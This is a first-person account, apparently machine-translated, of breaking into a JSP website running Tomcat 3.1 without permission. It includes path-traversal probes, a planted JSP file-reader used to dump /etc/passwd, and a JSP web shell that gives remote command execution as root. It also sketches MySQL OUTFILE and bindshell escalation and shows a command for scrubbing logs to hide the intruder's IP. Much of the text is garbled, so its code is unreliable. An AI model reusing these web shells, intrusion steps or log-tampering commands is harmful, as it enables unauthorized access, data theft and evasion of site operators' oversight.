Self-built web intrusion process JSP

By chance, I saw a website with fresh and comfortable pages. The website is developed using JSP,

Because of my personal interests, I decided to look at the security of the system.
Telnet www.target.com 8080
GET/maid HTTP/1.1
[Enter]
[Enter]
The returned results are as follows:
HTTP/1.0 404 not found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-engine: Tomcat web server/3.1 (JSP 1.1; servlet 2.2; Java 1.2.2;

Linux 2
. 2.12 i386; Java. Vendor = Blackdown Java-Linux Team)
Content-language: En
Content-Type: text/html
Status: 404

<H1> error: 404 <H2> location:/chinansl </H2> file not found <br>/chinansl

 

I got the name of the running webserver "Tomcat 3.1 ". I remember I once discovered this version of vulnerability,

And post to bugtrap.
Probably: you can exit the web directory through the ".." technology, so:
Http: // target: 8080/.../../% 00.jsp (NO)
Http: // target: 8080/file/index. jsp (NO)
Http: // target: 8080/index. jsp (NO)
Http: // target: 8080/index. jsp % 81 (NO)
Http: // target: 8080/index. js % 70 (NO)
Http: // target: 8080/index. jsp % 2581 (NO)
Http: // target: 8080/WEB-INF/(NO)
Well, try it! Tomcat 3.1 comes with a management tool that allows you to view directories and files on the web.

To add context. Try: http: // target: 8080/admin/
The Administrator did not delete or prohibit access to this directory:-(error !!!!!
Click the "view all context" button to list the names of some files and directories under the web directory.

After reading it carefully, I found a file upload component in a short time. Hey, write a JSP file and get it.

Look.
I wrote this article about the time of several coffers:
<% @ Page import = "Java. Io. *" %>
<%
String file = request. getparameter ("file ");
String STR = "";
Fileinputstream FCM = NULL;
Datainputstream Dis = NULL;
Try {
FS = new fileinputstream (File );
Dis = new datainputstream (FCM );
While (true ){
Try {
STR = dis. Readline ();
} Catch (exception e ){}
If (STR = NULL) break;
Out. Print (STR + "<br> ");
}
} Catch (ioexception e ){}
%>

 

Upload the JSP file to the web directory of the other party through the uploaded component, and then:
Http: // target: 8080/upload/test. jsp? File =/etc/passwd
Hey, the password is out. I only read "/etc/passwd" and did not read "/etc/shadow" because

WebServer is generally started using the nobody identity. (Mistakes)
The next process is boring to guess the password and fail. Forget it. I only need to know what it means.

If you have a shell, you can't guess the password, so IE is my shell environment!
Write again:
<% @ Page import = "Java. Io. *" %>
<%
Try {
String cmd = request. getparameter ("cmd ");
Process child = runtime.getruntime(cmd.exe C (CMD );
Inputstream in = Child. getinputstream ();
Int C;
While (C = in. Read ())! =-1 ){
Out. Print (char) C );
}
In. Close ();
Try {
Child. waitfor ();
} Catch (interruptedexception e ){
E. printstacktrace ();
}
} Catch (ioexception e ){
System. Err. println (E );
}
%>

 

Then upload the JSP file through upload again. Hey, I have a shell now.
Http: // target: 8080/upload/CMD. jsp? Cmd = LS +-La +/
(I won't list it here)
How to get root? After some searches, I found that MySQL is installed in the system and I got it from the source code of JSP.

MySQL password :) to see what permissions are running for MySQL:
Sqld "> http: // target: 8080/upload/CMD. jsp? Cmd = Ps + Aux + | grep + mysqld
Display:
Root 87494 0.2 1.9 17300 4800 P0-s 28jun01. 72/usr/local/data/MySQL
Hey, there is a solution. The system runs MYSQL as root, and I know the MySQL password.

You can write a shell program to create a table, put my data in the table, and then use

"Select... into OUTFILE;" to create a file on the system, so that when you execute Su,

Run my program. (Do you still remember that apache.org was intruded? Hacker uses this method ).
Then, I upload a program such as bindshell, run the program, and obtain the nobody permission, and then use Su.

The setuid shell created by the root user makes itself the root user.
Hey, it's a good way. I'm proud of my ideas ......

Next thing, I almost didn't vomit blood:
I typed A: http: // target: 8080/upload/CMD. jsp? Cmd = ID
Display:
Uid = 0 (Root) gid = 0 (XXX) groups = 0 (XXX), 2 (XXX), 3 (XXX), 4 (XXX), 5 (XXX ), 20 (XXX), 31

(Xxx)
Kao: My web shell is root. I have actually served the Administrator and myself. It turned out to be a mess.

So long, ah!
Http: // target: 8080/upload/CMD. jsp? Cmd = Ps + Aux
It was run as root (not listed)

The remaining things:
1. delete my Telnet records.
2. Delete HTTP logs.
As for clearing logs, I used cat XXX | grep-V "ip"> temp to overwrite temp.

Those log files that have been modified by me.
I didn't change his page, because I am not a hacker, not a hacker, but a network security.

Fans. So, send an email to system admin!
Of course, by the way, I mentioned in my letter that we would be very happy if it was needed to provide him with security services!